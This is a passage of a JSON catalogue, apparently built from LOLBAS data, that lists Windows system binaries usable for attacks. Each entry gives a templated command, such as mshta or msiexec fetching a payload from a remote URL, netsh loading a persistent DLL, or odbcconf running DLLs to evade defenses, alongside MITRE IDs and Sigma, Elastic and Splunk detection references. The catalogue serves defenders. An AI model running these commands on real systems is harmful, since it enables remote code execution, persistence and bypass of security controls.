ecurity/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"mshta.exe executing raw or obfuscated script within the command-line"},{"type":"IOC","value":"General usage of HTA file"},{"type":"IOC","value":"msthta.exe network connection to Internet/WWW resource"},{"type":"IOC","value":"DotNet CLR libraries loaded into mshta.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - mshta.exe.log"}],"references":["https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4","https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Mshta/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:mshta-exe:3","toolId":"lolbas:mshta-exe","toolName":"Mshta.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"mshta.exe \"{PATH_ABSOLUTE}:file.hta\"","description":"Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.","usecase":"Execute code hidden in alternate data stream","mitre":["T1218.005"],"privilege":"user","fullPath":["C:\\Windows\\System32\\mshta.exe","C:\\Windows\\SysWOW64\\mshta.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_lethalhta_technique.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f8f643041a584621e66cf8e6d534ad3db92edc29/rules/windows/defense_evasion_mshta_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/lateral_movement_dcom_hta.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/stories/suspicious_mshta_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_renamed.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_spawn.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_child_process.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_url_in_command_line.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"mshta.exe executing raw or obfuscated script within the command-line"},{"type":"IOC","value":"General usage of HTA file"},{"type":"IOC","value":"msthta.exe network connection to Internet/WWW resource"},{"type":"IOC","value":"DotNet CLR libraries loaded into mshta.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - mshta.exe.log"}],"references":["https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4","https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Mshta/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:mshta-exe:4","toolId":"lolbas:mshta-exe","toolName":"Mshta.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"mshta.exe {REMOTEURL}","description":"It will download a remote payload and place it in INetCache.","usecase":"Downloads payload from remote server","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\mshta.exe","C:\\Windows\\SysWOW64\\mshta.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_lethalhta_technique.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f8f643041a584621e66cf8e6d534ad3db92edc29/rules/windows/defense_evasion_mshta_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/lateral_movement_dcom_hta.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/stories/suspicious_mshta_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_renamed.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_spawn.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_child_process.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_url_in_command_line.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"mshta.exe executing raw or obfuscated script within the command-line"},{"type":"IOC","value":"General usage of HTA file"},{"type":"IOC","value":"msthta.exe network connection to Internet/WWW resource"},{"type":"IOC","value":"DotNet CLR libraries loaded into mshta.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - mshta.exe.log"}],"references":["https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4","https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Mshta/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msiexec-exe:0","toolId":"lolbas:msiexec-exe","toolName":"Msiexec.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msiexec /quiet /i {PATH:.msi}","description":"Installs the target .MSI file silently.","usecase":"Execute custom made msi file with attack code","mitre":["T1218.007"],"privilege":"user","fullPath":["C:\\Windows\\System32\\msiexec.exe","C:\\Windows\\SysWOW64\\msiexec.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/uninstall_app_using_msiexec.yml"},{"type":"IOC","value":"msiexec.exe retrieving files from Internet"}],"references":["https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/","https://twitter.com/PhilipTsukerman/status/992021361106268161","https://badoption.eu/blog/2023/10/03/MSIFortune.html","https://lolbas-project.github.io/lolbas/Binaries/Msiexec/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msiexec-exe:1","toolId":"lolbas:msiexec-exe","toolName":"Msiexec.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msiexec /q /i {REMOTEURL}","description":"Installs the target remote & renamed .MSI file silently.","usecase":"Execute custom made msi file with attack code from remote server","mitre":["T1218.007"],"privilege":"user","fullPath":["C:\\Windows\\System32\\msiexec.exe","C:\\Windows\\SysWOW64\\msiexec.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/uninstall_app_using_msiexec.yml"},{"type":"IOC","value":"msiexec.exe retrieving files from Internet"}],"references":["https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/","https://twitter.com/PhilipTsukerman/status/992021361106268161","https://badoption.eu/blog/2023/10/03/MSIFortune.html","https://lolbas-project.github.io/lolbas/Binaries/Msiexec/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msiexec-exe:2","toolId":"lolbas:msiexec-exe","toolName":"Msiexec.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msiexec /y {PATH_ABSOLUTE:.dll}","description":"Calls DllRegisterServer to register the target DLL.","usecase":"Execute dll files","mitre":["T1218.007"],"privilege":"user","fullPath":["C:\\Windows\\System32\\msiexec.exe","C:\\Windows\\SysWOW64\\msiexec.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/uninstall_app_using_msiexec.yml"},{"type":"IOC","value":"msiexec.exe retrieving files from Internet"}],"references":["https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/","https://twitter.com/PhilipTsukerman/status/992021361106268161","https://badoption.eu/blog/2023/10/03/MSIFortune.html","https://lolbas-project.github.io/lolbas/Binaries/Msiexec/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msiexec-exe:3","toolId":"lolbas:msiexec-exe","toolName":"Msiexec.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msiexec /z {PATH_ABSOLUTE:.dll}","description":"Calls DllUnregisterServer to un-register the target DLL.","usecase":"Execute dll files","mitre":["T1218.007"],"privilege":"user","fullPath":["C:\\Windows\\System32\\msiexec.exe","C:\\Windows\\SysWOW64\\msiexec.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/uninstall_app_using_msiexec.yml"},{"type":"IOC","value":"msiexec.exe retrieving files from Internet"}],"references":["https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/","https://twitter.com/PhilipTsukerman/status/992021361106268161","https://badoption.eu/blog/2023/10/03/MSIFortune.html","https://lolbas-project.github.io/lolbas/Binaries/Msiexec/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msiexec-exe:4","toolId":"lolbas:msiexec-exe","toolName":"Msiexec.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msiexec /i {PATH_ABSOLUTE:.msi} TRANSFORMS=\"{REMOTEURL:.mst}\" /qb","description":"Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input.","usecase":"Install trusted and signed msi file, with additional attack code as transformation file, from a remote server","mitre":["T1218.007"],"privilege":"user","fullPath":["C:\\Windows\\System32\\msiexec.exe","C:\\Windows\\SysWOW64\\msiexec.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/uninstall_app_using_msiexec.yml"},{"type":"IOC","value":"msiexec.exe retrieving files from Internet"}],"references":["https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/","https://twitter.com/PhilipTsukerman/status/992021361106268161","https://badoption.eu/blog/2023/10/03/MSIFortune.html","https://lolbas-project.github.io/lolbas/Binaries/Msiexec/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msoxmled-exe:0","toolId":"lolbas:msoxmled-exe","toolName":"msoxmled.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"msoxmled.exe /verb open {REMOTEURL}","description":"Downloads payload from remote server using the Microsoft Office XML Editor.","usecase":"It will download a remote payload and place it in INetCache.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Office\\root\\vfs\\ProgramFilesCommonX64\\Microsoft Shared\\Office16\\msoxmled.exe","C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE14\\msoxmled.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"`msoxmled.exe` making network connections to external URLs"},{"type":"IOC","value":"Unexpected file downloads initiated by `msoxmled.exe`"},{"type":"IOC","value":"Event ID 1 with Image: `msoxmled.exe` and CommandLine: `/verb open`"}],"references":["https://learn.microsoft.com/en-us/answers/questions/4805030/where-is-msoxmled-exe-for-office-professional-2013","https://lolbas-project.github.io/lolbas/Binaries/msoxmled/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:netsh-exe:0","toolId":"lolbas:netsh-exe","toolName":"Netsh.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"netsh.exe add helper {PATH_ABSOLUTE:.dll}","description":"Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called","usecase":"Proxy execution of .dll","mitre":["T1546.007"],"privilege":"admin","fullPath":["C:\\WINDOWS\\System32\\Netsh.exe","C:\\WINDOWS\\SysWOW64\\Netsh.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/2b87b26bdc2a84b65b1355ffbd5174bdbdb1879c/detections/endpoint/processes_launching_netsh.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/detections/deprecated/processes_created_by_netsh.yml"},{"type":"IOC","value":"Netsh initiating a network connection"}],"references":["https://freddiebarrsmith.com/trix/trix.html","https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html","https://liberty-shell.com/sec/2018/07/28/netshlep/","https://lolbas-project.github.io/lolbas/Binaries/Netsh/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:ngen-exe:0","toolId":"lolbas:ngen-exe","toolName":"Ngen.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"ngen.exe {REMOTEURL}","description":"Downloads payload from remote server using the Microsoft Native Image Generator utility.","usecase":"It will download a remote payload and place it in INetCache.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\ngen.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\ngen.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe"],"toolType":"Binary","references":["https://lolbas-project.github.io/lolbas/Binaries/Ngen/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:odbcconf-exe:0","toolId":"lolbas:odbcconf-exe","toolName":"Odbcconf.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"odbcconf /a {REGSVR {PATH_ABSOLUTE:.dll}}","description":"Execute DllRegisterServer from DLL specified.","usecase":"Execute a DLL file using technique that can evade defensive counter measures","mitre":["T1218.008"],"privilege":"user","fullPath":["C:\\Windows\\System32\\odbcconf.exe","C:\\Windows\\SysWOW64\\odbcconf.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_odbcconf_response_file.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_odbcconf_response_file_susp.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b","https://github.com/woanware/application-restriction-bypasses","https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/","https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:odbcconf-exe:1","toolId":"lolbas:odbcconf-exe","toolName":"Odbcconf.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"odbcconf INSTALLDRIVER \"lolbas-project|Driver={PATH_ABSOLUTE:.dll}|APILevel=2\"\nodbcconf configsysdsn \"lolbas-project\" \"DSN=lolbas-project\"","description":"Install a driver and load the DLL. Requires administrator privileges.","usecase":"Execute dll file using technique that can evade defensive counter measures","mitre":["T1218.008"],"privilege":"user","fullPath":["C:\\Windows\\System32\\odbcconf.exe","C:\\Windows\\SysWOW64\\odbcconf.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_odbcconf_response_file.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_odbcconf_response_file_susp.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b","https://github.com/woanware/application-restriction-bypasses","https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/","https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:odbcconf-exe:2","toolId":"lolbas:odbcconf-exe","toolName":"Odbcconf.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"odbcconf -f {PATH:.rsp}","description":"Load DLL specified in target .RSP file. See the Code Sample section for an example .RSP file.","usecase":"Execute dll file using technique that can evade defensive counter measures","mitre":["T1218.008"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\odbcconf.exe","C:\\Windows\\SysWOW64\\odbcconf.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_odbcconf_response_file.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_odbcconf_response_file_susp.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b","https://github.com/woanware/application-restriction-bypasses","https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/","https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:offlinescannershell-exe:0","toolId":"lolbas:offlinescannershell-exe","toolName":"OfflineScannerShell.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"OfflineScannerShell","description":"Execute mpclient.dll library in the current working directory","usecase":"Can be used to evade defensive countermeasures or to hide as a persistence mechanism","mitre":["T1218"],"privilege":"admin","fullPath":["C:\\Program Files\\Windows Defender\\Offline\\OfflineScannerShell.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbas_offlinescannershell.yml"},{"type":"IOC","value":"OfflineScannerShell.exe should not be run on a normal workstation"}],"references":["https://lolbas-project.github.io/lolbas/Binaries/OfflineScannerShell/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:onedrivestandaloneupdater-exe:0","toolId":"lolbas:onedrivestandaloneupdater-exe","toolName":"OneDriveStandaloneUpdater.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"OneDriveStandaloneUpdater","description":"Download a file from the web address specified in `HKCU\\Software\\Microsoft\\OneDrive\\UpdateOfficeConfig\\UpdateRingSettingURLFromOC`. `ODSUUpdateXMLUrlFromOC` and `UpdateXMLUrlFromOC` must be equal to non-empty string values in that same registry key. `UpdateOfficeConfigTimestamp` is a UNIX epoch time which must be set to a large QWORD such as 99999999999 (in decimal) to indicate the URL cache is good. The downloaded file will be in `%localappdata%\\OneDrive\\StandaloneUpdater\\PreSignInSettingsConfig.json`.","usecase":"Download a file from the Internet without executing any anomalous executables with suspicious arguments","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe","C:\\Program Files\\Microsoft OneDrive\\OneDriveStandaloneUpdater.exe","C:\\Program Files (x86)\\Microsoft OneDrive\\OneDriveStandaloneUpdater.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"HKCU\\Software\\Microsoft\\OneDrive\\UpdateOfficeConfig\\UpdateRingSettingURLFromOC being set to a suspicious non-Microsoft controlled URL"},{"type":"IOC","value":"Reports of downloading from suspicious URLs in %localappdata%\\OneDrive\\setup\\logs\\StandaloneUpdate_*.log files"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml"}],"references":["https://github.com/LOLBAS-Project/LOLBAS/pull/153","https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:pcalua-exe:0","toolId":"lolbas:pcalua-exe","toolName":"Pcalua.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"pcalua.exe -a {PATH:.exe}","description":"Open the target .EXE using the Program Compatibility Assistant.","usecase":"Proxy execution of binary","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\pcalua.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml"}],"references":["https://twitter.com/KyleHanslovan/status/912659279806640128","https://lolbas-project.github.io/lolbas/Binaries/Pcalua/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:pcalua-exe:1","toolId":"lolbas:pcalua-exe","toolName":"Pcalua.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"pcalua.exe -a {PATH_SMB:.dll}","description":"Open the target .DLL file with the Program Compatibilty 